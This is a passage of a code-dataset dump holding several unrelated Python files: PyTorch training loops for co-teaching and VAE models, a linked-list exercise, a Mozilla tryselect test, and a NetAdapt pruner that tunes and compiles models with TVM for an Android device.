output1.logits\n\n output2 = self.model2(input_ids = batch['input_ids'],\n attention_mask = batch['attention_mask'])\n pred_2 = output2.logits\n\n loss_1, loss_2, pure_rate_1, pure_rate_2 = self.coteaching_loss(pred_1, pred_2,\n labels = batch['labels'],\n GT_labels = batch['GT_labels'],\n num_remember = remember_num[total_itr])\n\n loss_dict_reduced = reduce_loss_dict({'loss_1': loss_1, 'loss_2': loss_2})\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n meters.update(loss = losses_reduced, **loss_dict_reduced)\n loss_1.backward()\n loss_2.backward()\n optimizer1.step()\n optimizer2.step()\n\n batch_time = time.time() - end\n end = time.time()\n meters.update(time = batch_time, data = data_time)\n meters.update(pure_rate_1 = pure_rate_1, pure_rate_2 = pure_rate_2)\n\n eta_seconds = meters.time.global_avg * (self.cfg.classifier.total_steps - iteration)\n eta_string = str(datetime.timedelta(seconds = int(eta_seconds)))\n\n if iteration % 10 == 0:\n self.logger.info(\n meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"total_itr: {total_itr}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n eta = eta_string,\n iter = iteration,\n total_itr = len(dataloader),\n meters = str(meters),\n lr = optimizer1.param_groups[0][\"lr\"],\n memory = torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,\n ),\n show_one = True\n )\n self.logger.plot_record(value = meters.loss.median, win_name = 'total loss')\n self.logger.plot_record(value = meters.loss_1.median, win_name = 'loss_1')\n self.logger.plot_record(value = meters.loss_2.median, win_name = 'loss_2')\n self.logger.plot_record(value = meters.pure_rate_1.median, win_name = 'pure_rate_1')\n self.logger.plot_record(value = meters.pure_rate_2.median, win_name = 'pure_rate_2')\n self.logger.plot_record(value = remember_num[total_itr].tolist(), win_name = 'remember_num')\n self.logger.visdom_text(text = 'epoch:{}, itr:{}'.format(epoch, iteration), win_name = 'epoch_itr')\n\n if (iteration + 0) % 100 == 0:\n self.logger.info('start eval...'.format(self.rank))\n synchronize()\n res_dict_1 = self.evaler(self.model1)\n res_dict_2 = self.evaler(self.model2)\n if (is_main_process()):\n f11 = res_dict_1['f1_micro']\n f22 = res_dict_2['f1_micro']\n self.logger.plot_record(f11, win_name = 'classifier_1 eval f1')\n self.logger.plot_record(f22, win_name = 'classifier_2 eval f1')\n if (f11 > best_res_1):\n best_res_1 = f11\n if (f11 > all_best):\n all_best = f11\n self.checkpointer.save_to_best_model_file(model = self.model1, other_info = res_dict_1)\n if (f22 > best_res_2):\n best_res_2 = f22\n if (f22 > all_best):\n all_best = f22\n self.checkpointer.save_to_best_model_file(model = self.model2, other_info = res_dict_2)\n self.logger.info('best classifier 1 f1_micro:{}'.format(best_res_1))\n self.logger.info('best classifier 2 f1_micro:{}'.format(best_res_2))\n\n self.logger.visdom_text(text = 'best classifier 1 f1_micro:{}'.format(best_res_1),\n win_name = 'best_f1_cls1')\n self.logger.visdom_text(text = 'best classifier 2 f1_micro:{}'.format(best_res_2),\n win_name = 'best_f1_cls2')\n\n self.logger.info('eval over')\n synchronize()\n\n # synchronize()\n # res_dict_1 = self.evaler(self.model1)\n # if (is_main_process()):\n # f11 = res_dict_1['f1_micro']\n # self.logger.plot_record(f11, win_name = 'classifier eval f1')\n # if (f11 > best_res_1):\n # best_res_1 = f11\n # self.checkpointer.save_to_best_model_file(model = self.model1, other_info = res_dict_1)\n # self.logger.info('best 
f1_micro:{}'.format(best_res_1))\n # self.logger.visdom_text(text = 'best f1_micro:{}'.format(best_res_1), win_name = 'best_f1')\n synchronize()\n self.logger.plot_record(value = best_res_1, win_name = 'itr classifier_1 best f1')\n self.logger.plot_record(value = best_res_2, win_name = 'itr classifier_2 best f1')\n return best_res_1\n\n def do_label_sentences(self, sentences):\n self.logger.info('start do_label_sentences'.format(self.rank))\n if (self.model1 is None):\n self.model1 = LongformerForSequenceClassification.from_pretrained('allenai/longformer-base-4096',\n num_labels = self.cfg.model.number_classes,\n gradient_checkpointing = True)\n self.checkpointer.load_from_best_model(self.model1)\n self.model1 = self.model1.to(device)\n if (self.distributed):\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model1)\n self.model1 = torch.nn.parallel.DistributedDataParallel(\n model, device_ids = [self.rank], output_device = self.rank, # find_unused_parameters=True\n )\n self.model1.eval()\n self.logger.info('eval to check before do_label_sentences')\n res = self.evaler(self.model1)\n self.logger.info('load from best model, model res:{}'.format(res))\n self.logger.info('do_label_sentences total unlabeled sentences:{}'.format(self.rank, len(sentences)))\n dataloader_sentence = self.__build_dataloader_eval_longformer__(sentences, labels = None, for_train = False)\n predicter = Predicter(cfg = self.cfg, logger = self.logger, distributed = True, rank = self.rank,\n dataloader_sentence = dataloader_sentence, model = self.model1)\n sentences_all, labels = predicter()\n self.model1.train()\n return sentences_all, labels\n","repo_name":"zhanglu-cst/ClassKG","sub_path":"Models/coteaching_longformer/trainer_coT_longformer.py","file_name":"trainer_coT_longformer.py","file_ext":"py","file_size_in_byte":13291,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"44007833159","text":"import numpy as np\nimport torch\nfrom torchvision.utils import make_grid\nfrom base import BaseTrainer\nfrom utils import inf_loop, MetricTracker\nfrom utils.gradcam import GradCam\nfrom utils.ramps import sigmoid_rampup\n\nclass Trainer(BaseTrainer):\n \"\"\"\n Trainer class\n \"\"\"\n\n def __init__(self, model, criterion, metric_ftns, optimizer, config, device,\n data_loader, valid_data_loader=None, lr_scheduler=None, len_epoch=None):\n super().__init__(model, criterion, metric_ftns, optimizer, config)\n self.config = config\n self.device = device\n self.data_loader = data_loader\n if len_epoch is None:\n # epoch-based training\n self.len_epoch = len(self.data_loader)\n else:\n # iteration-based training\n self.data_loader = inf_loop(data_loader)\n self.len_epoch = len_epoch\n self.valid_data_loader = valid_data_loader\n self.do_valid = True #self.valid_data_loader is not None\n self.lr_scheduler = lr_scheduler\n self.log_step = 50 #int(np.sqrt(data_loader.batch_size))\n\n self.train_metrics = MetricTracker(\n 'loss', 'kld_loss', 'recons_loss',\n # *[m.__name__ for m in self.metric_ftns],\n writer=self.writer)\n self.valid_metrics = MetricTracker(\n 'loss', 'kld_loss', 'recons_loss', \n # *[m.__name__ for m in self.metric_ftns],\n writer=self.writer)\n\n # self.grad_cam = GradCam(self.model)\n\n self.fix_noise = None\n\n def _train_epoch(self, epoch):\n \"\"\"\n Training logic for an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains average loss and metric in this epoch.\n \"\"\"\n self.model.train()\n 
self.train_metrics.reset()\n\n # (1) from the Pytorch_VAE\n # kld_weight = batchsize / image_amount \n # kld_weight = 1./len(self.data_loader)\n\n # (2) from the last answaer \n # in https://stats.stackexchange.com/questions/332179/how-to-weight-kld-loss-vs-reconstruction-loss-in-variational-auto-encoder\n # kld_weight = latent_size / image_size(H*W)\n D = self.config['arch']['args']['latent_dim']\n H = self.config['train_loader']['args']['im_res']\n kld_norm = D/(H*H*3)\n w_kld = self.config['w_kld']\n # w_kld = sigmoid_rampup(current=epoch-1, rampup_length=self.epochs//4)\n for batch_idx, (data, target) in enumerate(self.data_loader):\n data, target = data.to(self.device), target.to(self.device)\n\n self.optimizer.zero_grad()\n output, mu, logvar = self.model(data)\n kld_loss = self.model.kld_loss(mu, logvar)\n recons_loss = self.model.recons_loss(data, output)\n loss = w_kld*kld_norm*kld_loss+recons_loss\n # loss = recons_loss\n\n loss.backward()\n self.optimizer.step()\n\n self.train_metrics.update('loss', loss.item())\n self.train_metrics.update('kld_loss', kld_loss.item())\n self.train_metrics.update('recons_loss', recons_loss.item())\n\n # for met in self.metric_ftns:\n # self.train_metrics.update(met.__name__, met(output, target))\n\n if (batch_idx+1) % self.log_step == 0:\n logstr = 'Train Epoch: {} {} Loss: {:.6f} [KLD: {:.6f}, Recons: {:.6f}] W_KLD:{:.6f}'.format(\n epoch, self._progress(batch_idx),\n self.train_metrics.current('loss')/self.log_step,\n self.train_metrics.current('kld_loss')/self.log_step,\n self.train_metrics.current('recons_loss')/self.log_step,\n w_kld)\n\n self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)\n # # log metrics\n # for met in self.metric_ftns:\n # logstr = logstr + \\\n # \" {}: {:.3f}\".format(\n # met.__name__, self.train_metrics.current(met.__name__)/self.log_step)\n\n self.train_metrics.log_all(log_step=self.log_step)\n self.logger.debug(logstr)\n\n # visulization\n N_sample = 8\n vis_im = torch.cat([\n data[:N_sample, ...],\n output[:N_sample, ...]\n ], dim=0)\n\n self.writer.add_image('recons',\n make_grid(vis_im.detach().cpu(),\n nrow=N_sample, normalize=True))\n\n # self.writer.add_image('input',\n # make_grid(plot_gram_cam(data[:64], self.grad_cam),\n # nrow=8, normalize=True))\n\n if batch_idx == self.len_epoch:\n break\n log = self.train_metrics.result()\n\n if self.do_valid:\n val_log = self._valid_epoch(epoch)\n # log.update(**{'val_'+k: v for k, v in val_log.items()})\n\n if self.lr_scheduler is not None:\n self.lr_scheduler.step()\n return log\n\n def _valid_epoch(self, epoch):\n \"\"\"\n validate after training an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains information about valid\n \"\"\"\n self.model.eval()\n self.valid_metrics.reset()\n with torch.no_grad():\n if self.fix_noise is None:\n N = 64\n D = self.config['arch']['args']['latent_dim']\n self.fix_noise = torch.randn((N, D)).to(self.device)\n\n gen_sample = self.model.decode(self.fix_noise)\n\n # for batch_idx, (data, target) in enumerate(self.valid_data_loader):\n # data, target = data.to(self.device), target.to(self.device)\n\n # output = self.model(data)\n # loss = self.criterion(output, target)\n\n # # update record\n # self.valid_metrics.update('loss', loss.item())\n # for met in self.metric_ftns:\n # self.valid_metrics.update(\n # met.__name__, met(output, target))\n # # self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))\n\n self.writer.set_step(\n epoch - 1, 'valid')\n # 
self.valid_metrics.log_all()\n self.writer.add_image('generate',\n make_grid(gen_sample.detach().cpu(),\n nrow=8, normalize=True))\n # add histogram of model parameters to the tensorboard\n # for name, p in self.model.named_parameters():\n # self.writer.add_histogram(name, p, bins='auto')\n return self.valid_metrics.result()\n\n def _progress(self, batch_idx):\n base = '[{}/{} ({:.0f}%)]'\n if hasattr(self.data_loader, 'n_samples'):\n current = batch_idx * self.data_loader.batch_size\n total = self.data_loader.n_samples\n else:\n current = batch_idx\n total = self.len_epoch\n return base.format(current, total, 100.0 * current / total)\n","repo_name":"592McAvoy/ml-proj2","sub_path":"trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19080603837","text":"# class LLNode:\n# def __init__(self, val, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n # Own solution w/ try-except block\n def solve(self, node):\n\n values = {}\n prev = None\n cur = node\n\n while cur:\n\n nxt = cur.next\n\n try:\n test = values[cur.val]\n\n # Test variable will pass if we have a duplicate. \n cur = None\n\n if prev != None:\n prev.next = nxt\n except:\n values[cur.val] = 0\n prev = cur\n \n cur = nxt\n \n return node\n \n # educative.io's solution with conditionals, faster than declaring {test}\n def solve2(self, node):\n\n cur = node\n prev = None\n dup_values = dict()\n\n while cur:\n if cur.val in dup_values:\n # Remove node:\n prev.next = cur.next\n cur = None\n else:\n # Have not encountered element before.\n dup_values[cur.val] = 1\n prev = cur\n \n cur = prev.next\n \n return node\n","repo_name":"Ry4nW/python-wars","sub_path":"binarysearch/removeDuplicatesInLL.py","file_name":"removeDuplicatesInLL.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40666863923","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\n\nimport mozunit\nimport pytest\nfrom six.moves import reload_module as reload\nfrom tryselect import push\nfrom tryselect.selectors import again\n\n\n@pytest.fixture(autouse=True)\ndef patch_history_path(tmpdir, monkeypatch):\n monkeypatch.setattr(push, \"history_path\", tmpdir.join(\"history.json\").strpath)\n reload(again)\n\n\ndef test_try_again(monkeypatch):\n push.push_to_try(\n \"fuzzy\",\n \"Fuzzy message\",\n try_task_config=push.generate_try_task_config(\n \"fuzzy\",\n [\"foo\", \"bar\"],\n {\"use-artifact-builds\": True},\n ),\n )\n\n assert os.path.isfile(push.history_path)\n with open(push.history_path, \"r\") as fh:\n assert len(fh.readlines()) == 1\n\n def fake_push_to_try(*args, **kwargs):\n return args, kwargs\n\n monkeypatch.setattr(push, \"push_to_try\", fake_push_to_try)\n reload(again)\n\n args, kwargs = again.run()\n\n assert args[0] == \"again\"\n assert args[1] == \"Fuzzy message\"\n\n try_task_config = kwargs.pop(\"try_task_config\")\n assert sorted(try_task_config.get(\"tasks\")) == sorted([\"foo\", \"bar\"])\n assert try_task_config.get(\"env\") == {\"TRY_SELECTOR\": \"fuzzy\"}\n assert try_task_config.get(\"use-artifact-builds\")\n\n with open(push.history_path, \"r\") as fh:\n assert len(fh.readlines()) == 1\n\n\ndef test_no_push_does_not_generate_history(tmpdir):\n assert not os.path.isfile(push.history_path)\n\n push.push_to_try(\n \"fuzzy\",\n \"Fuzzy\",\n try_task_config=push.generate_try_task_config(\n \"fuzzy\",\n [\"foo\", \"bar\"],\n {\"use-artifact-builds\": True},\n ),\n dry_run=True,\n )\n assert not os.path.isfile(push.history_path)\n assert again.run() == 1\n\n\nif __name__ == \"__main__\":\n mozunit.main()\n","repo_name":"WaterfoxCo/Waterfox","sub_path":"tools/tryselect/test/test_again.py","file_name":"test_again.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":3159,"dataset":"github-code","pt":"34"} +{"seq_id":"35940291737","text":"from multiprocessing import Process\nimport logging\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport copy\nimport json\nimport torch\nfrom schema import And, Optional\n\nfrom nni.utils import OptimizeMode\n\nfrom nni.compression.pytorch.compressor import Pruner\nfrom nni.compression.pytorch.utils.config_validation import CompressorSchema\nfrom nni.compression.pytorch.utils.num_param_counter import get_total_num_weights\nfrom .constants_pruner import PRUNER_DICT\n\n################### TVM build part addition ###############\nfrom pruned_vgg_maxpool import VGG \nimport _pickle as cPickle\nimport time\nimport torch.onnx\nimport onnxruntime\nimport tensorflow as tf\n\nimport socket\nimport sys \n\nimport tvm\nfrom tvm import relay, auto_scheduler\nimport numpy as np\nimport tvm.relay.testing\nfrom tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner\nfrom tvm import rpc\nfrom tvm.contrib import utils, ndk, graph_runtime as runtime\n#from tvm.contrib import graph_executor ## for normal running\nfrom tvm.contrib.debugger import debug_executor as graph_executor ## for debugging\n#from torchsummary import summary\nfrom nni.compression.pytorch.utils.counter import count_flops_params\n\nfrom nni.compression.pytorch import ModelSpeedup\nimport gc\n###########################################################\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass NetAdaptPruner(Pruner):\n \"\"\"\n A Pytorch implementation 
of NetAdapt compression algorithm.\n\n Parameters\n ----------\n model : pytorch model\n The model to be pruned.\n config_list : list\n Supported keys:\n - sparsity : The target overall sparsity.\n - op_types : The operation type to prune.\n short_term_fine_tuner : function\n function to short-term fine tune the masked model.\n This function should include `model` as the only parameter,\n and fine tune the model for a short term after each pruning iteration.\n Example::\n\n def short_term_fine_tuner(model, epoch=3):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n train_loader = ...\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n model.train()\n for _ in range(epoch):\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n optimizer.step()\n evaluator : function\n function to evaluate the masked model.\n This function should include `model` as the only parameter, and returns a scalar value.\n Example::\n\n def evaluator(model):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n val_loader = ...\n model.eval()\n correct = 0\n with torch.no_grad():\n for data, target in val_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n # get the index of the max log-probability\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n accuracy = correct / len(val_loader.dataset)\n return accuracy\n optimize_mode : str\n optimize mode, `maximize` or `minimize`, by default `maximize`.\n base_algo : str\n Base pruning algorithm. `level`, `l1`, `l2` or `fpgm`, by default `l1`. 
Given the sparsity distribution among the ops,\n the assigned `base_algo` is used to decide which filters/channels/weights to prune.\n sparsity_per_iteration : float\n sparsity to prune in each iteration.\n experiment_data_dir : str\n PATH to save experiment data,\n including the config_list generated for the base pruning algorithm and the performance of the pruned model.\n \"\"\"\n\n def __init__(self, model, config_list, short_term_fine_tuner, evaluator, val_loader, num, dummy_input, criterion,\n optimize_mode='maximize', base_algo='l1', sparsity_per_iteration=0.01, experiment_data_dir='./'):\n # models used for iterative pruning and evaluation\n self._model_to_prune = copy.deepcopy(model)\n self._base_algo = base_algo\n\n super().__init__(model, config_list)\n\n self._short_term_fine_tuner = short_term_fine_tuner\n self._evaluator = evaluator\n self._optimize_mode = OptimizeMode(optimize_mode)\n\n # hyper parameters for NetAdapt algorithm\n self._sparsity_per_iteration = sparsity_per_iteration\n\n # overall pruning rate\n self._sparsity = config_list[0]['sparsity']\n\n # config_list\n self._config_list_generated = []\n\n self._experiment_data_dir = experiment_data_dir\n if not os.path.exists(self._experiment_data_dir):\n os.makedirs(self._experiment_data_dir)\n\n self._tmp_model_path = os.path.join(self._experiment_data_dir, 'tmp_model.pth')\n\n # addition\n self._num = num\n self._val_loader = val_loader\n self._criterion = criterion\n self._dummy_input = dummy_input\n\n def validate_config(self, model, config_list):\n \"\"\"\n Parameters\n ----------\n model : torch.nn.Module\n Model to be pruned\n config_list : list\n List on pruning configs\n \"\"\"\n\n if self._base_algo == 'level':\n schema = CompressorSchema([{\n 'sparsity': And(float, lambda n: 0 < n < 1),\n Optional('op_types'): [str],\n Optional('op_names'): [str],\n }], model, _logger)\n elif self._base_algo in ['l1', 'l2', 'fpgm']:\n schema = CompressorSchema([{\n 'sparsity': And(float, lambda n: 0 < n < 1),\n 'op_types': ['Conv2d'],\n Optional('op_names'): [str]\n }], model, _logger)\n\n schema.validate(config_list)\n\n def calc_mask(self, wrapper, **kwargs):\n return None\n\n def _update_config_list(self, config_list, op_name, sparsity):\n '''\n update sparsity of op_name in config_list\n '''\n config_list_updated = copy.deepcopy(config_list)\n\n for idx, item in enumerate(config_list):\n if op_name in item['op_names']:\n config_list_updated[idx]['sparsity'] = sparsity\n return config_list_updated\n\n # if op_name is not in self._config_list_generated, create a new json item\n if self._base_algo in ['l1', 'l2', 'fpgm']:\n config_list_updated.append(\n {'sparsity': sparsity, 'op_types': ['Conv2d'], 'op_names': [op_name]})\n elif self._base_algo == 'level':\n config_list_updated.append(\n {'sparsity': sparsity, 'op_names': [op_name]})\n\n return config_list_updated\n\n def _get_op_num_weights_remained(self, op_name, module):\n '''\n Get the number of weights remained after channel pruning with current sparsity\n\n Returns\n -------\n int\n remained number of weights of the op\n '''\n\n # if op is wrapped by the pruner\n for wrapper in self.get_modules_wrapper():\n if wrapper.name == op_name:\n return wrapper.weight_mask.sum().item()\n\n # if op is not wrapped by the pruner\n return module.weight.data.numel()\n\n def _get_op_sparsity(self, op_name):\n for config in self._config_list_generated:\n if 'op_names' in config and op_name in config['op_names']:\n return config['sparsity']\n return 0\n\n def 
_calc_num_related_weights(self, op_name):\n '''\n Calculate the total number of weights of the op and the next op, applicable only for models without dependencies among ops\n\n Parameters\n ----------\n op_name : str\n\n Returns\n -------\n int\n total number of all the related (current and the next) op weights\n '''\n num_weights = 0\n flag_found = False\n previous_name = None\n previous_module = None\n\n for name, module in self._model_to_prune.named_modules():\n if not flag_found and name != op_name and type(module).__name__ in ['Conv2d', 'Linear']:\n previous_name = name\n previous_module = module\n if not flag_found and name == op_name:\n _logger.debug(\"original module found: %s\", name)\n num_weights = module.weight.data.numel()\n\n # consider related pruning in this op caused by previous op's pruning\n if previous_module:\n sparsity_previous_op = self._get_op_sparsity(previous_name)\n if sparsity_previous_op:\n _logger.debug(\n \"decrease op's weights by %s due to previous op %s's pruning...\", sparsity_previous_op, previous_name)\n num_weights *= (1-sparsity_previous_op)\n\n flag_found = True\n continue\n if flag_found and type(module).__name__ in ['Conv2d', 'Linear']:\n _logger.debug(\"related module found: %s\", name)\n # channel/filter pruning crossing is considered here, so only the num_weights after channel pruning is valuable\n num_weights += self._get_op_num_weights_remained(name, module)\n break\n\n _logger.debug(\"num related weights of op %s : %d\", op_name, num_weights)\n\n return num_weights\n\n def _test3(self, model, input_name, ctx, text):\n test_loss = 0 \n correct = 0 \n total_time = 0 \n cases = 20\n loc = 0 \n warm_up = 10\n with torch.no_grad():\n for data, target in self._val_loader:\n loc = loc + 1 \n if loc % 5 == 0:\n print(loc)\n if loc == cases + 1:\n break\n output_arr = np.array([1,2])\n for i in range(len(target)):\n model.set_input(input_name, np.expand_dims(data[i], 0)) \n t0 = time.time()\n model.run()\n t1 = time.time()\n if loc > warm_up:\n total_time += (t1 - t0) \n output = model.get_output(0)\n output = output.asnumpy()\n output = np.ravel(output, order='C')\n if i == 0:\n output_arr = output\n else:\n output_arr = np.append(output_arr, output, axis=0)\n output_arr = output_arr.reshape(len(target), 10) \n output_arr = torch.from_numpy(output_arr)\n # sum up batch loss\n test_loss += self._criterion(output_arr, target).item()\n # get the index of the max log-probability\n pred = output_arr.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n real_cases = (cases - warm_up) * len(target)\n# test_loss /= real_cases\n# accuracy = correct / real_cases\n latency = (total_time*1000) / real_cases\n# fps2 = real_cases / total_time\n print('{} Latency: {:.6f}'.format(text, latency))\n# print('{} Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Latency: {:.6f}'.format(\n# text, test_loss, correct, real_cases, 100. 
* accuracy, latency))\n\n return latency\n\n def _tune_tasks(\n self,\n tasks,\n measure_option,\n tuner=\"xgb\",\n n_trial=1000,\n early_stopping=None,\n log_filename=\"tuning.log\",\n use_transfer_learning=True,\n ):\n from tvm import autotvm # the record/callback helpers used below live in tvm.autotvm; only the tuner classes are imported at module level\n # create tmp log file\n tmp_log_file = log_filename + \".tmp\"\n if os.path.exists(tmp_log_file):\n os.remove(tmp_log_file)\n\n for i, tsk in enumerate(reversed(tasks)):\n prefix = \"[Task %2d/%2d] \" % (i+1, len(tasks))\n # create tuner\n if tuner == \"xgb\" or tuner == \"xgb-rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=100)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n if use_transfer_learning:\n if os.path.isfile(tmp_log_file):\n tuner_obj.load_history(autotvm.record.load_from_file(tmp_log_file))\n\n # do tuning\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n # pick best records to a cache file\n autotvm.record.pick_best(tmp_log_file, log_filename)\n os.remove(tmp_log_file)\n\n def compress(self):\n \"\"\"\n Compress the model.\n\n Returns\n -------\n torch.nn.Module\n model with specified modules compressed.\n \"\"\"\n _logger.info('Starting NetAdapt Compression...')\n from PIL import Image\n from tvm.contrib.download import download_testdata\n img_url = \"https://github.com/dmlc/mxnet.js/blob/main/data/cat.png?raw=true\"\n img_path = download_testdata(img_url, \"cat.png\", module=\"data\")\n img = Image.open(img_path).resize((32, 32))\n from torchvision import transforms\n my_preprocess = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(), \n transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),\n ]\n )\n img = my_preprocess(img)\n img = np.expand_dims(img, 0)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n arch = \"arm64\"\n target = \"llvm -mtriple=%s-linux-android\" % arch \n# target = \"opencl --device=mali\"\n# target_host = \"llvm -mtriple=arm64-linux-android\"\n# my_shape = cPickle.load(open(os.path.join('/github/evta2/output', str(num), 'my_shape.p'),'rb'))\n# torch_model = VGG(my_shape=my_shape, depth=16).to(device)\n# torch_model.load_state_dict(torch.load(os.path.join('/github/evta2/output', str(num), 'model_trained.pth')))\n# torch_model.eval()\n################# Autotune added\n network = \"vgg\"\n device_key = \"android\"\n log_file = \"%s.%s.log\" % (device_key, network)\n dtype = \"float32\"\n use_android = True\n################################\n self._model_to_prune.eval()\n _, _, temp_results = count_flops_params(self._model_to_prune, (1, 3, 32, 32))\n print(\"=================== Model info test ======================\")\n print(temp_results[1].get('input_size')[1])\n print(\"========================= end ============================\")\n input_shape = [1, 3, 32, 32]\n output_shape = [1, 10]\n input_data = torch.randn(input_shape).to(device)\n scripted_model = torch.jit.trace(self._model_to_prune, input_data).eval()\n# scripted_model = torch.jit.trace(torch_model, input_data).eval()\n input_name = \"input0\"\n shape_list = [(input_name, img.shape)]\n mod, params = 
relay.frontend.from_pytorch(scripted_model, shape_list)\n ########### NCHW -> NHWC ############\n desired_layouts = {'nn.conv2d': ['NHWC', 'default'], 'nn.dense': ['NHWC', 'default']}\n seq = tvm.transform.Sequential([relay.transform.RemoveUnusedFunctions(),\n relay.transform.ConvertLayout(desired_layouts),\n relay.transform.InferType(),\n relay.transform.FoldConstant(),\n# relay.transform.DebugPrint(),\n relay.transform.DeadCodeElimination()])\n with tvm.transform.PassContext(opt_level=3):\n mod = seq(mod)\n# print(\"=============== Relay IR Module ================\")\n# print(mod)\n #####################################\n tracker_host = os.environ.get(\"TVM_TRACKER_HOST\", \"0.0.0.0\")\n tracker_port = int(os.environ.get(\"TVM_TRACKER_PORT\", 9191))\n\n #################### Extract search tasks ###################\n print(\"Extract tasks...\")\n tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target)\n# tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target=\"opencl --device=mali\", target_host=target)\n print(\"=============== Weights check ==============\")\n print(task_weights)\n\n for idx, task in enumerate(tasks): \n print(\"============ Task %d (workload key: %s) ===========\" % (idx, task.workload_key))\n print(task)\n# print(task.compute_dag) \n \n #################### Tuning #####################\n print(\"Begin tuning...\")\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n# print(tuner.task_tags)\n\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=2000, #17,\n builder=auto_scheduler.LocalBuilder(build_func=\"ndk\" if use_android else \"default\"),\n runner=auto_scheduler.RPCRunner(device_key, host=tracker_host, port=tracker_port, timeout=10000, repeat=1, min_repeat_ms=200, enable_cpu_cache_flush=True,),\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n\t verbose=1,\n early_stopping=24,\n )\n tuner.tune(tune_option)#, per_task_early_stopping=30)\n \n #################### Compile ####################\n print(\"Compile...\")\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}):\n lib = relay.build_module.build(mod, params=params, target=target)\n# lib = relay.build(mod, params=params, target=\"opencl\", target_host=target)\n \n tmp = utils.tempdir()\n lib_fname = tmp.relpath(\"net.so\")\n lib.export_library(lib_fname, ndk.create_shared)\n remote = auto_scheduler.utils.request_remote(device_key, tracker_host, tracker_port, timeout=10000)\n remote.upload(lib_fname)\n rlib = remote.load_module(\"net.so\")\n\n # Create graph executor\n ctx = remote.cpu()\n# ctx = remote.cl(0)\n# module = graph_executor.GraphModule(rlib[\"default\"](ctx))\n module = graph_executor.GraphModuleDebug(rlib[\"default\"](ctx), [ctx], rlib.get_json(), dump_root=\"./tvmdbg\")\n\n current_latency = self._test3(module, input_name, ctx, \"TVM_initial\")\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# module.set_input(input_name, data_tvm)\n# print(\"Evaluate inference time cost...\")\n# ftimer = module.module.time_evaluator(\"run\", ctx, repeat=3, min_repeat_ms=500)\n# prof_res = np.array(ftimer().results) * 1e3\n# print(\"Mean inference time (std dev): %8.4f ms (%8.4f ms)\" %(np.mean(prof_res), np.std(prof_res)))\n# current_latency = np.mean(prof_res)\n #################################################\n input_data = None\n scripted_model = None\n mod = None\n params = None\n lib = None\n 
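# The extract/tune/compile sequence above reduces to a small reusable shape.
# A sketch assuming an Ansor log file already exists; no re-tuning happens here.
import tvm
from tvm import relay, auto_scheduler

def compile_with_history(mod, params, target, log_file):
    # Replay the best schedules recorded during tuning, then build the module.
    with auto_scheduler.ApplyHistoryBest(log_file):
        with tvm.transform.PassContext(
                opt_level=3, config={"relay.backend.use_auto_scheduler": True}):
            return relay.build(mod, params=params, target=target)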
